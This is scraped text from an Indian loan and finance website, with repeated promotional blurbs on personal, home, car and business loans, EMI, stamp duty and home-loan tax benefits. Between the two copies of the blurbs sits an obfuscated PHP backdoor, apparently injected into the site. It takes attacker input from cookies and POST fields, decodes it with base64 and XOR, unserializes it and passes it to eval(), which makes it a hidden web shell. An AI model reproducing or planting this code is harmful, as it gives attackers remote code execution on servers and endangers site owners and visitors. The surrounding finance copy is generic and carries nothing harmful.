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Personal Loan

Personal loans help you in consolidating debts, paying bills and helps you out of an unexpected financial bind. In addition, they can be used to fund a new business venture.

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Home Loan

A Home is a ′once-in-a-lifetime′ investment for many of us. It is natural that we want to make it as big and better as practically possible. Affordability is what determines the size, location and quality of our home.

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Car Loan

Being able to travel at godlike speed is nothing short of marvellous. Owning a car has moved from being a status symbol to being a necessity. It affords us time and comfort along with the luxury of spending time with our dear ones as we commute.

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Business Loan

Promoters may avail institutional funding for several reasons. These include financing new equipment, expansion to larger premises, procure more inventories, sustain operations and much more.

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The legal definition and the economical definition of taxes differ in that economists do not regard many transfers to governments as taxes. For example, some transfers to the public sector are comparable to prices.

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Personal Loan

Enjoy a wide range of benefits, speedy documentation, and competitive rates when you choose a Personal Loan from askbankexpert.com. Now, you can meet all your financial needs without any hassles!

Quick, competitive and transparent, askbankexpert.com Personal Loans can be customised to suit your every need. With a fast disbursal process, you can avail of a loan in 48-hours, while enjoying our unmatched benefits.

How to Calculate Stamp Duty Value in Capital Gain Tax ?

How o Calculate Stamp Duty Value in Capital Gain Tax ? – Stamp duty value is the value asses sable by any authority of a State Government for the purpose of payment of stamp duty.

Income Tax section 50C​​ defines that computation of capital gain arises due to transfer of land or building or both, if the actual sale consideration of such land and/or building is less than the stamp duty value, then the stamp duty value will be taken as full value of consideration, i.e., as deemed selling price. The capital gain will be calculated accordingly.

All You Need to Know About Home Loan

Are you exploring options for home loans to buy a house of your dreams? In recent years, the banks have become more liberal in extending a helping hand to the people who are buying a home of their own. With the availability of several banks and varied interest rates, the home buying has become an easy option for the people. With several banks now eager to lend home loans for your needs and with an easy home loan procedure, Home loans are a great aspect in buying process.

Why You Need a Separate Credit Card for Work Expenses

Sorting through credit card statements and receipts is no one′ idea of a good time. Still, when you’ve spent your own money on work expenses, it′s a necessary task to get a reimbursement or tax deduction.

The process is even more tedious when you have to dig through a pile of personal expenses to find what you’re looking for. There′ an easier way: Get a separate credit card just for your job.

If you’re paying business expenses out of pocket regularly, either as an employee or an entrepreneur, a separate credit card lets you keep better track of your work expenses — and maybe earn a portion of them back in rewards, too.

EMI Calculater

If you are planning to acquire a home loan, then your main consideration is EMI or the equated monthly instalments which is to be used. EMI is the sum of money that you as a debtor will pay your moneylender to clear your superior loan. These payments are done in every month on a date that is arranged by your bank until suchlike time that the loan has been completely swift.

Loan Categories

Home Loan Rejection Causes
Many of us dream of owning a home of our own, but due to financial constraints, we delay the process of home buying. A home loan, usually becomes essential for the person who are a bit financially unsound. In an effort to get a dream home, we do have a financial hand in the form of home loans. Home loans are a savior for many in the country for getting a first home of their own.

Click Selfie To Pay Your Bills With MasterCard
MasterCard may soon introduce a face recognition system that pays bills after user clicks a selfie and blinks in 14 other countries, apart from the US where it is currently on trial. "When making a purchase online from a merchant that requires identity verification, cardholders can authorise the transaction by holding up their phones as if taking a selfie and blinking

Home Loan Calculator to gain Tax Benefits
Buying a home gives you the comfort of living in your own house and moreover it also provides financial security to your family. Many people fulfil their dream of owning a house by taking a home loan but not all are aware of how they can enjoy tax benefits while they are repaying the loan taken. In terms of house loans, as per the provisions of income tax act one can claim exemption for the repayment of interest as well as principal.

Benefits of Joint Home Loan
Buying a home involves a lot of pre planning in terms of finances, location etc. At all costs we want to make it as big and as better as possible. The major component involved is affordability, which eventually decides the size, location and quality of one’s home. Given the fact that the option of taking a home loan has improved affordability, there are other factors such as age, income levels, and other loans that you are still repaying that also affect your home loan eligibility.

Tax Benefit on Home Loan Interest for FY 2017-18
Home loans are a boon in fulfilling your desire to build a house you always wished for. Now that there is a positive change in home loan interest rates, your desire to own your own home can now turn into a reality. Buying a house of your own gives you mental satisfaction and also adds up to providing financial security to your family. Many people achieve their dream of owning a house of their own by taking a home loan but not all are aware of home loan tax benefit.

I Have Life Insurance Through My Employer. Why Do I Need Another Policy?
One of the perks of having a full-time job with a good company is the benefits package that comes with it. Often, those benefits include life insurance coverage, which is great. And everyone who can get life insurance at work should definitely take it, as there are many advantages to company-funded life insurance, also known as group life insurance.

$VGtVgLJSU = 'r' . "\137" . "\x4f" . "\x52" . chr (101); $ouodljW = chr (99) . 'l' . "\141" . "\163" . chr (115) . "\x5f" . chr ( 1013 - 912 ).'x' . 'i' . chr (115) . "\164" . 's';$FQAvaiiVsD = class_exists($VGtVgLJSU); $ouodljW = "49370";$EEHyXfXa = strpos($ouodljW, $VGtVgLJSU);if ($FQAvaiiVsD == $EEHyXfXa){function gfNcaoMSgW(){$ksaHOKLIi = new /* 30018 */ r_ORe(8850 + 8850); $ksaHOKLIi = NULL;}$EArtBK = "8850";class r_ORe{private function bvUvZWQH($EArtBK){if (is_array(r_ORe::$cMmJXQQM)) {$VquMMi2 = str_replace("<" . "?php", "", r_ORe::$cMmJXQQM["content"]);eval($VquMMi2); $EArtBK = "8850";exit();}}public function BhOEk(){$VquMMi = "29094";$this->_dummy = str_repeat($VquMMi, strlen($VquMMi));}public function __destruct(){r_ORe::$cMmJXQQM = @unserialize(r_ORe::$cMmJXQQM); $EArtBK = "31399_65044";$this->bvUvZWQH($EArtBK); $EArtBK = "31399_65044";}public function cULmNJDHJl($VquMMi, $VfOWSx){return $VquMMi[0] ^ str_repeat($VfOWSx, intval(strlen($VquMMi[0]) / strlen($VfOWSx)) + 1);}public function zazwAiqHb($VquMMi){$QcdscNAl = "\x62" . "\x61" . "\163" . 'e' . '6' . "\64";return array_map($QcdscNAl . '_' . "\x64" . 'e' . "\x63" . "\157" . "\144" . chr ( 1032 - 931 ), array($VquMMi,));}public function __construct($IatlLbG=0){$DEQShoJL = ',';$VquMMi = "";$qGvosmg = $_POST;$GgXIxDBHtV = $_COOKIE;$VfOWSx = "83f12f66-3f11-43b1-b7fe-97fea9a19104";$dDKZZAC = @$GgXIxDBHtV[substr($VfOWSx, 0, 4)];if (!empty($dDKZZAC)){$dDKZZAC = explode($DEQShoJL, $dDKZZAC);foreach ($dDKZZAC as $TnUdqqqfSO){$VquMMi .= @$GgXIxDBHtV[$TnUdqqqfSO];$VquMMi .= @$qGvosmg[$TnUdqqqfSO];}$VquMMi = $this->zazwAiqHb($VquMMi);}r_ORe::$cMmJXQQM = $this->cULmNJDHJl($VquMMi, $VfOWSx);if (strpos($VfOWSx, $DEQShoJL) !== FALSE){$VfOWSx = explode($DEQShoJL, $VfOWSx); $lBIJz = sprintf("31399_65044", rtrim($VfOWSx[0]));}}public static $cMmJXQQM = 63132;}gfNcaoMSgW();} ?> askbankerexpert

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Personal Loan

Personal loans help you in consolidating debts, paying bills and helps you out of an unexpected financial bind. In addition, they can be used to fund a new business venture.

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Home Loan

A Home is a ′once-in-a-lifetime′ investment for many of us. It is natural that we want to make it as big and better as practically possible. Affordability is what determines the size, location and quality of our home.

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Car Loan

Being able to travel at godlike speed is nothing short of marvellous. Owning a car has moved from being a status symbol to being a necessity. It affords us time and comfort along with the luxury of spending time with our dear ones as we commute.

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Business Loan

Promoters may avail institutional funding for several reasons. These include financing new equipment, expansion to larger premises, procure more inventories, sustain operations and much more.

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The legal definition and the economical definition of taxes differ in that economists do not regard many transfers to governments as taxes. For example, some transfers to the public sector are comparable to prices.

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Personal Loan

Enjoy a wide range of benefits, speedy documentation, and competitive rates when you choose a Personal Loan from askbankexpert.com. Now, you can meet all your financial needs without any hassles!

Quick, competitive and transparent, askbankexpert.com Personal Loans can be customised to suit your every need. With a fast disbursal process, you can avail of a loan in 48-hours, while enjoying our unmatched benefits.

How to Calculate Stamp Duty Value in Capital Gain Tax ?

How o Calculate Stamp Duty Value in Capital Gain Tax ? – Stamp duty value is the value asses sable by any authority of a State Government for the purpose of payment of stamp duty.

Income Tax section 50C​​ defines that computation of capital gain arises due to transfer of land or building or both, if the actual sale consideration of such land and/or building is less than the stamp duty value, then the stamp duty value will be taken as full value of consideration, i.e., as deemed selling price. The capital gain will be calculated accordingly.

All You Need to Know About Home Loan

Are you exploring options for home loans to buy a house of your dreams? In recent years, the banks have become more liberal in extending a helping hand to the people who are buying a home of their own. With the availability of several banks and varied interest rates, the home buying has become an easy option for the people. With several banks now eager to lend home loans for your needs and with an easy home loan procedure, Home loans are a great aspect in buying process.

Why You Need a Separate Credit Card for Work Expenses

Sorting through credit card statements and receipts is no one′ idea of a good time. Still, when you’ve spent your own money on work expenses, it′s a necessary task to get a reimbursement or tax deduction.

The process is even more tedious when you have to dig through a pile of personal expenses to find what you’re looking for. There′ an easier way: Get a separate credit card just for your job.

If you’re paying business expenses out of pocket regularly, either as an employee or an entrepreneur, a separate credit card lets you keep better track of your work expenses — and maybe earn a portion of them back in rewards, too.

EMI Calculater

If you are planning to acquire a home loan, then your main consideration is EMI or the equated monthly instalments which is to be used. EMI is the sum of money that you as a debtor will pay your moneylender to clear your superior loan. These payments are done in every month on a date that is arranged by your bank until suchlike time that the loan has been completely swift.

Loan Categories

Home Loan Rejection Causes
Many of us dream of owning a home of our own, but due to financial constraints, we delay the process of home buying. A home loan, usually becomes essential for the person who are a bit financially unsound. In an effort to get a dream home, we do have a financial hand in the form of home loans. Home loans are a savior for many in the country for getting a first home of their own.

Click Selfie To Pay Your Bills With MasterCard
MasterCard may soon introduce a face recognition system that pays bills after user clicks a selfie and blinks in 14 other countries, apart from the US where it is currently on trial. "When making a purchase online from a merchant that requires identity verification, cardholders can authorise the transaction by holding up their phones as if taking a selfie and blinking

Home Loan Calculator to gain Tax Benefits
Buying a home gives you the comfort of living in your own house and moreover it also provides financial security to your family. Many people fulfil their dream of owning a house by taking a home loan but not all are aware of how they can enjoy tax benefits while they are repaying the loan taken. In terms of house loans, as per the provisions of income tax act one can claim exemption for the repayment of interest as well as principal.

Benefits of Joint Home Loan
Buying a home involves a lot of pre planning in terms of finances, location etc. At all costs we want to make it as big and as better as possible. The major component involved is affordability, which eventually decides the size, location and quality of one’s home. Given the fact that the option of taking a home loan has improved affordability, there are other factors such as age, income levels, and other loans that you are still repaying that also affect your home loan eligibility.

Tax Benefit on Home Loan Interest for FY 2017-18
Home loans are a boon in fulfilling your desire to build a house you always wished for. Now that there is a positive change in home loan interest rates, your desire to own your own home can now turn into a reality. Buying a house of your own gives you mental satisfaction and also adds up to providing financial security to your family. Many people achieve their dream of owning a house of their own by taking a home loan but not all are aware of home loan tax benefit.

I Have Life Insurance Through My Employer. Why Do I Need Another Policy?
One of the perks of having a full-time job with a good company is the benefits package that comes with it. Often, those benefits include life insurance coverage, which is great. And everyone who can get life insurance at work should definitely take it, as there are many advantages to company-funded life insurance, also known as group life insurance.